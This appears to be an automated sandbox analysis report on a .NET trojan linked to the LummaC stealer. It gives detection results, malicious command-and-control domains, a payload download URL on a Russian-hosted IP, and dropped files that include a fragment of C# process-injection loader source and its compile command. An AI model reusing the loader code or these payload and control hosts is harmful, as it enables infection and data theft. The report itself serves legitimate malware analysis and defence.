        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        htZgRRla8S.exe55%ReversingLabsByteCode-MSIL.Trojan.Zilla
        htZgRRla8S.exe100%AviraHEUR/AGEN.1306918
        htZgRRla8S.exe100%Joe Sandbox ML

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll100%AviraHEUR/AGEN.1300034
        C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll100%Joe Sandbox ML

        Unpacked PE Files

        No Antivirus matches

        Domains

        SourceDetectionScannerLabelLink
        zinc-sneark.biz100%URL Reputationmalware
        dwell-exclaim.biz100%URL Reputationmalware
        formy-spill.biz100%URL Reputationmalware

        URLs

        SourceDetectionScannerLabelLink
        http://147.45.44.131/infopage/ung0.exeP0%Avira URL Cloudsafe
        https://covery-mover.biz/2100%Avira URL Cloudmalware
        https://covery-mover.biz/apiQ100%Avira URL Cloudmalware
        https://covery-mover.biz/100%Avira URL Cloudmalware
        http://147.45.44.131/infopage/ung0.exe0%Avira URL Cloudsafe
        http://147.45.44.1310%Avira URL Cloudsafe
        https://covery-mover.biz/apin100%Avira URL Cloudmalware
        https://covery-mover.biz/api100%Avira URL Cloudmalware

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        covery-mover.biz
        		172.67.206.64
        		truefalse
          		high
          se-blurry.biz
          		unknown
          		unknownfalse
            		high
            zinc-sneark.biz
            		unknown
            		unknowntrue
            • 100%, URL Reputation
            		unknown
            dwell-exclaim.biz
            		unknown
            		unknowntrue
            • 100%, URL Reputation
            		unknown
            formy-spill.biz
            		unknown
            		unknowntrue
            • 100%, URL Reputation
            		unknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            https://covery-mover.biz/apitrue
            • Avira URL Cloud: malware
            		unknown
            dare-curbys.bizfalse
              		high
              impend-differ.bizfalse
                		high
                zinc-sneark.bizfalse
                  		high
                  covery-mover.bizfalse
                    		high
                    http://147.45.44.131/infopage/ung0.exetrue
                    • Avira URL Cloud: safe
                    		unknown
                    formy-spill.bizfalse
                      		high
                      se-blurry.bizfalse
                        		high
                        print-vexer.bizfalse
                          		high
                          dwell-exclaim.bizfalse
                            		high

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://covery-mover.biz/2RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://covery-mover.biz/RegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://covery-mover.biz/apiQRegAsm.exe, 00000005.00000002.2179542666.0000000000DC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000005.00000002.2179542666.0000000000DAE000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://covery-mover.biz/apinRegAsm.exe, 00000005.00000002.2179755073.0000000000E1A000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            http://147.45.44.131/infopage/ung0.exePhtZgRRla8S.exe, 00000000.00000002.2139643170.0000000003031000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehtZgRRla8S.exe, 00000000.00000002.2139643170.000000000309B000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              http://147.45.44.131htZgRRla8S.exe, 00000000.00000002.2139643170.000000000309B000.00000004.00000800.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: safe
                              		unknown

                              World Map of Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public IPs

                              IPDomainCountryFlagASNASN NameMalicious
                              147.45.44.131
                              		unknownRussian Federation
                              		2895FREE-NET-ASFREEnetEUtrue
                              172.67.206.64
                              		covery-mover.bizUnited States
                              		13335CLOUDFLARENETUSfalse

                              General Information

                              Joe Sandbox version:41.0.0 Charoite
                              Analysis ID:1574065
                              Start date and time:2024-12-12 21:31:06 +01:00
                              Joe Sandbox product:CloudBasic
                              Overall analysis duration:0h 3m 24s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Cookbook file name:default.jbs
                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                              Number of analysed new started processes analysed:6
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Sample name:htZgRRla8S.exe
                              renamed because original name is a hash value
                              Original Sample Name:b1becdbff2a34334ae4ff5f387115ec3.exe
                              Detection:MAL
                              Classification:mal100.troj.expl.evad.winEXE@8/7@5/2
                              EGA Information:
                              • Successful, ratio: 100%
                              HCA Information:
                              • Successful, ratio: 94%
                              • Number of executed functions: 22
                              • Number of non-executed functions: 120
                              Cookbook Comments:
                              • Found application associated with file extension: .exe
                              • Stop behavior analysis, all processes terminated

                              Warnings

                              • Exclude process from analysis (whitelisted): dllhost.exe
                              • Excluded IPs from analysis (whitelisted): 13.107.246.63
                              • Excluded domains from analysis (whitelisted): otelrules.azureedge.net
                              • Not all processes where analyzed, report is missing behavior information
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.
                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                              • VT rate limit hit for: htZgRRla8S.exe

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              15:32:06API Interceptor1x Sleep call for process: htZgRRla8S.exe modified
                              15:32:06API Interceptor6x Sleep call for process: RegAsm.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              147.45.44.131Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                              • 147.45.44.131/infopage/ilk.exe
                              Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                              • 147.45.44.131/infopage/bgfi.ps1
                              Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                              • 147.45.44.131/infopage/ung0.exe
                              EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                              • 147.45.44.131/infopage/vsom.exe
                              MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                              • 147.45.44.131/infopage/Tom.exe
                              ZjH6H6xqo7.exeGet hashmaliciousLummaCBrowse
                              • 147.45.44.131/infopage/tvh53.exe
                              nlJ2sNaZVi.exeGet hashmaliciousLummaCBrowse
                              • 147.45.44.131/infopage/tbh75.exe
                              TZ33WZy6QL.exeGet hashmaliciousLummaCBrowse
                              • 147.45.44.131/infopage/tbg9.exe
                              7IXl1M9JGV.exeGet hashmaliciousLummaCBrowse
                              • 147.45.44.131/infopage/tbg9.exe
                              7IXl1M9JGV.exeGet hashmaliciousUnknownBrowse
                              • 147.45.44.131/infopage/bhdh552.ps1
                              172.67.206.64z3oPvgjvyN.exeGet hashmaliciousLummaC StealerBrowse
                                Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                  https://update-download.transfernow.net/dl/20240625xVCUV6maGet hashmaliciousHTMLPhisherBrowse
                                    https://link.sbstck.com/redirect/07cc7c38-01c9-45b4-adfb-583529674442?j=eyJ1IjoiM3l4NDRuIn0.hIfuke8RAzj-gbQmS59B61RAw2SA19eZRoxzpvNlDOUGet hashmaliciousHtmlDropper, HTMLPhisherBrowse

                                      Domains

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      covery-mover.bizz3oPvgjvyN.exeGet hashmaliciousLummaC StealerBrowse
                                      • 172.67.206.64
                                      Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                      • 172.67.206.64
                                      wa6qrGANga.exeGet hashmaliciousLummaC StealerBrowse
                                      • 104.21.58.186
                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                      • 104.21.58.186

                                      ASNs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      CLOUDFLARENETUS0TGy7VIqx7CSab5o.lNK.lnkGet hashmaliciousUnknownBrowse
                                      • 172.67.185.252
                                      https://es-proposal.webflow.io/Get hashmaliciousHTMLPhisherBrowse
                                      • 104.21.112.1
                                      http://ebaumsworld.comGet hashmaliciousUnknownBrowse
                                      • 104.17.159.113
                                      https://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                      • 104.18.20.58
                                      http://mavenclinic.quatrix.itGet hashmaliciousUnknownBrowse
                                      • 104.18.21.58
                                      https://morgans-proposal-site.webflow.io/Get hashmaliciousCaptcha Phish, HTMLPhisherBrowse
                                      • 172.64.151.8
                                      https://Scotts2fa.solitran.ru/JtZiK3LK/#Dmark.ochs@scotts.comGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      https://link.edgepilot.com/s/f30932b1/vPPKRjWXhUuvPsJT0zGKsQ?u=https://lf7oxrhbb.cc.rs6.net/tn.jsp?f=001h06J4Rg18suvxSEI1tED4DAF8iRuyxY1F6LaYcn7sb4iX7GBolUHc7ee-KUx3ocXE9JkVShRAfV1x6aenzzKcDmVc2_grDROu5C380NMdm5zgykpeK24RW4ydxOZY-zzWGqXDAcSMsLIRx7mTviOEg==%26c=rtZvyEmdrWl6DZ9XsciJKGlh47UQUNn-J3NXlYUvzX0mHT2yPp0J7g==%26ch=pbMEYYEPfkmXeu_oUdJD2iMHpz6dLW5FEUtMz_fcwAIrF1HSqrYuCA==%26__=wp-admin/wp/2XWV/Dcndx/c3Njb3R0QGRjbmR4LmNvbQ=%3DGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                      • 104.18.11.207
                                      https://dashboard.sizle.io/p/f7c9cdf19Get hashmaliciousHTMLPhisherBrowse
                                      • 104.18.95.41
                                      2024 Tepa LLC RFP Proposal.docxGet hashmaliciousUnknownBrowse
                                      • 104.17.25.14
                                      FREE-NET-ASFREEnetEUCaptcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                      • 147.45.44.131
                                      Captcha.htaGet hashmaliciousHTMLPhisherBrowse
                                      • 147.45.44.131
                                      Captcha.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                      • 147.45.44.131
                                      EBUdultKh7.exeGet hashmaliciousLummaC StealerBrowse
                                      • 147.45.44.131
                                      arm5.elfGet hashmaliciousUnknownBrowse
                                      • 193.233.202.23
                                      Wh2c6sgwRo.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                      • 147.45.47.151
                                      installer.exeGet hashmaliciousUnknownBrowse
                                      • 193.233.254.0
                                      installer.exeGet hashmaliciousUnknownBrowse
                                      • 193.233.254.0
                                      MiJZ3z4t5K.exeGet hashmaliciousUnknownBrowse
                                      • 147.45.44.131
                                      tyhkamwdmrg.exeGet hashmaliciousLummaC StealerBrowse
                                      • 147.45.47.81

                                      JA3 Fingerprints

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, Vidar, XmrigBrowse
                                      • 172.67.206.64
                                      file.exeGet hashmaliciousAmadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                      • 172.67.206.64
                                      510005940.docx.docGet hashmaliciousUnknownBrowse
                                      • 172.67.206.64
                                      z3oPvgjvyN.exeGet hashmaliciousLummaC StealerBrowse
                                      • 172.67.206.64
                                      Captcha.htaGet hashmaliciousLummaC, Cobalt Strike, HTMLPhisher, LummaC StealerBrowse
                                      • 172.67.206.64
                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                      • 172.67.206.64
                                      ZzS8KjNjr7.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      • 172.67.206.64
                                      Szi2WJUKmv.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      • 172.67.206.64
                                      aYxpioi6G3.exeGet hashmaliciousLummaCBrowse
                                      • 172.67.206.64
                                      PGkSZbFKmI.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                      • 172.67.206.64

                                      Dropped Files

                                      No context

                                      Created / dropped Files

                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\htZgRRla8S.exe.log

                                      Download File
                                      Process:C:\Users\user\Desktop\htZgRRla8S.exe
                                      File Type:CSV text
                                      Category:dropped
                                      Size (bytes):847
                                      Entropy (8bit):5.345615485833535
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KlKDE4KhKiKhPKIE4oKNzKoZAE4KzeR:MxHKlYHKh3oPtHo6hAHKzeR
                                      MD5:EEEC189088CC5F1F69CEE62A3BE59EA2
                                      SHA1:250F25CE24458FC0C581FDDF59FAA26D557844C5
                                      SHA-256:5345D03A7E6C9436497BA4120DE1F941800F2522A21DE70CEA6DB1633D356E11
                                      SHA-512:2E017FD29A505BCAC78C659DE10E0D869C42CE3B057840680B23961DBCB1F82B1CC7094C87CEEB8FA14826C4D8CFED88DC647422A4A3FA36C4AAFD6430DAEFE5
                                      Malicious:true
                                      Reputation:moderate, very likely benign file
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02b0c61bb4\System.Xml.ni.dll",0..

                                      C:\Users\user\AppData\Local\Temp\RESA4E1.tmp

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x492, 9 symbols, created Thu Dec 12 22:22:50 2024, 1st section name ".debug$S"
                                      Category:dropped
                                      Size (bytes):1336
                                      Entropy (8bit):3.977794044893717
                                      Encrypted:false
                                      SSDEEP:24:Hvmm9p7BjHFYwKTFexmfwI+ycuZhNnakSZPNnqSSd:PZ7Bj1KTAxmo1ulna3bqSC
                                      MD5:88618807677F41A26D55B3829298FDA6
                                      SHA1:45F4D5FE273B9B853610C3158A33C46C44D06B9E
                                      SHA-256:439DD8C21E507D3CB39341A2412B89018FF19A820A8FFE9AC27793306F60672E
                                      SHA-512:F286CE4CD669584E16CC7E83E61F944842AFB33AFAF98DAA7C0C34424FAE49ACBC2DC5E04F99A633592403B891732F19D725A2E08ECC8824FF4CF2499DACCA49
                                      Malicious:false
                                      Reputation:low
                                      Preview:L...:b[g.............debug$S........T...................@..B.rsrc$01........X.......8...........@..@.rsrc$02........P...B...............@..@........U....c:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP...................8..&ZZaWVs...............5.......C:\Users\user\AppData\Local\Temp\RESA4E1.tmp.-.<....................a..Microsoft (R) CVTRES.].=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.i.o.b.m.u.r.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.

                                      C:\Users\user\AppData\Local\Temp\qiobmurj\CSCE088865CA7FA428F90DCC973FB284B32.TMP

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      File Type:MSVC .res
                                      Category:dropped
                                      Size (bytes):652
                                      Entropy (8bit):3.0960170624873573
                                      Encrypted:false
                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1ak7YnqqZPN5Dlq5J:+RI+ycuZhNnakSZPNnqX
                                      MD5:D638F6C8265A5A61575673CC03DFD61E
                                      SHA1:A324532AE255224AA85F3C12402D7ACB1A664AA9
                                      SHA-256:96B9EEC1365C6301CEA72ABE5320F981C77A968F6504B31E2FF2B3FD6E5C3318
                                      SHA-512:390183B00E4B1AF605ADE28675EFE473B3B8B971974BA4E237EB1BC387CF97776EF13EF2F3FFABD1D5549BD7C5BF35DA34E94ABC7B8740673E61AE205AB22165
                                      Malicious:false
                                      Reputation:low
                                      Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.i.o.b.m.u.r.j...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.i.o.b.m.u.r.j...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                      C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.0.cs

                                      Download File
                                      Process:C:\Users\user\Desktop\htZgRRla8S.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):10583
                                      Entropy (8bit):4.487855797297623
                                      Encrypted:false
                                      SSDEEP:192:eC2oTLpQgzLOoBwMw2kdl/kSpu/TuvnMHzrEx:tDLOoBol/kSpgCvMfM
                                      MD5:B022C6FE4494666C8337A975D175C726
                                      SHA1:8197D4A993E7547D19D7B067B4D28EBE48329793
                                      SHA-256:D02016A307B3E8DA1A80C29551D44C17358910816E992BC1B53DA006D62DD56A
                                      SHA-512:DF670235E87B1EE957086BE88731B458C28629E65E052276DD543BE273030986A7E5C67FA83587F68EC06FA0F33B0C3F1F041C2D06073709B340F96C3884F2B9
                                      Malicious:true
                                      Reputation:low
                                      Preview:.using System;..using System.Diagnostics;..using System.Runtime.InteropServices;....public class Engineers..{.. #region ConversionMethods.. public static Int16 ConvertToInt16(byte[] value, int startIndex).. {.. return BitConverter.ToInt16(value, startIndex);.. }.... public static Int32 ConvertToInt32(byte[] value, int startIndex).. {.. return BitConverter.ToInt32(value, startIndex);.. }.... public static byte[] ConvertToBytes(int value).. {.. return BitConverter.GetBytes(value);.. }.. #endregion.... #region ApiNames.. public static string[] GetApiNames().. {.. return new string[].. {.. "kernel32",.. "ntdll",.. "ResumeThread",.. "Wow64SetThreadContext",.. "SetThreadContext",.. "Wow64GetThreadContext",.. "GetThreadContext",.. "VirtualAllocEx",.. "WriteProcessMemory",.. "ReadProcessMemory",..

                                      C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.cmdline

                                      Download File
                                      Process:C:\Users\user\Desktop\htZgRRla8S.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                      Category:dropped
                                      Size (bytes):206
                                      Entropy (8bit):4.98929983941783
                                      Encrypted:false
                                      SSDEEP:3:0HXEXA8F+H2R5BJiWR5mKWLRRUkh4E2J5xAIh5QyMKNdH0iQCIFRVRMxTPIUkh4X:pAu+H2L/6K2923fhEHzxszI923fhEC
                                      MD5:41ADF820EA116B0DB84164F65E3C31F9
                                      SHA1:7662FEA49C60EF3A690AE0C0E2B22950E0B31BDC
                                      SHA-256:5348E39A778FD86F61FAF82DB7509C00C95FD6FC5CC8287C33DC1D22EDDBD773
                                      SHA-512:8F28148286B9D5DADB3E2E45F91D72C554B01FA8D2A142FD40AA25E977B0DA1284692513D79F9C6ADF71F88FA87073CE1FD9B62BEB14D1B1EE895DF2DB79F02C
                                      Malicious:true
                                      Preview:./t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.0.cs"

                                      C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll

                                      Download File
                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Category:dropped
                                      Size (bytes):8704
                                      Entropy (8bit):4.6605382207517545
                                      Encrypted:false
                                      SSDEEP:192:QkCaQHf9WDa/u66Rj2ca6Uxd5MqkeNc4:AWDlD95D05MqHy4
                                      MD5:2ACAF59B3936210B2628C468DC76EC72
                                      SHA1:FB610BEE00064B7AE1D5E77A707591AF970AD211
                                      SHA-256:55083D754DB0E0ACD71E32ABA2A7020476A6AB8A174D390A5186141950CDBF5C
                                      SHA-512:53DE04E752F144CA84F7E5E343D6E56184F212825677E8AE1736D5E1502E827F3BD5BC0577CF2472FFD8F77907D7C30269159754901C183275E074BAF9CE2ADA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: Avira, Detection: 100%
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:b[g...........!.................9... ...@....... ....................................@..................................9..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`....... ..............@..B.................9......H.......d%.............................................................."..(....*"..(....*..(....*...0..m.................r...p...r...p...r...p...r9..p...re..p...r...p...r...p...r...p...r...p....r...p....r=..p....rg..p..*...(......(.........(....(.........*....0..&....... .......+E......YE....................YE............+....+....,....+...+.....X...2...8..............................(....(....}....~.....r...p~....~..... ....~.........o0.......-.s....z..<(..........4X(......

                                      C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.out

                                      Download File
                                      Process:C:\Users\user\Desktop\htZgRRla8S.exe
                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF, CR line terminators
                                      Category:modified
                                      Size (bytes):705
                                      Entropy (8bit):5.23311383030231
                                      Encrypted:false
                                      SSDEEP:12:KMi/qR37L/6KzpEHwpE7KaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:KMoqdn6KzHeKax5DqBVKVrdFAMBJTH
                                      MD5:9EB6C5E40B2715C7BC2D9025EEFE5E7D
                                      SHA1:4488A1B81B664943CAC9DEEA4E833F751CC1EED4
                                      SHA-256:11A46F049DB323FCE69272001686E4B5B6B5122D32BAE5A0DE77BC05CD4F937F
                                      SHA-512:9181CB8B7455DAF4104C20D33E4AEDF443C28AD8A6296EC9FA14D6DAB63BB445E7451ED512640BD2D93FABE7EAFF9D89CA6FA87A3DE185F34739A9C60357A190
                                      Malicious:false
                                      Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.dll" /debug- /optimize+ "C:\Users\user\AppData\Local\Temp\qiobmurj\qiobmurj.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                      Static File Info

                                      General

                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):3.9255822092902686
                                      TrID:
                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                      • DOS Executable Generic (2002/1) 0.01%
                                      File name:htZgRRla8S.exe
                                      File size:45'568 bytes
                                      MD5:b1becdbff2a34334ae4ff5f387115ec3
                                      SHA1:492305491185a6114ef915ff3b5f705c5facd086
                                      SHA256:c89c8a2ec7d0da083703bd095ba75a8656ae9fd1ffa08b26c8e43d6d04e468c9
                                      SHA512:cef1ace82713bb51aa5c10f47f98aee859dbb363e33a081c60ed6aba43e8ae3d2f09c27d75cc84b242882eb74773083b6cb70160e42b22126757d95cae82a9db
                                      SSDEEP:768:Orn01NSVwafevGHkiV++I1gqDnJuuAuznQVLNvxu0BvkwIt6BcN4fe3Xn:Or01N7aeGEk+11Tu9AnQVLNppvk9RN4e
                                      TLSH:0F23695171FEA029D5B7EBB5BEDDACEDC89E5971182C649700C1928B4B20FE0EA43D34
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5\..........."...0.................. ........@.. ....................... ............`................................

                                      File Icon

                                      Icon Hash:00928e8e8686b000

                                      Static PE Info

                                      General

                                      Entrypoint:0x40c3ee
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0xC45C35F2 [Thu May 24 08:50:58 2074 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                      Entrypoint Preview

                                      Instruction
                                      jmp dword ptr [00402000h]
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax], al
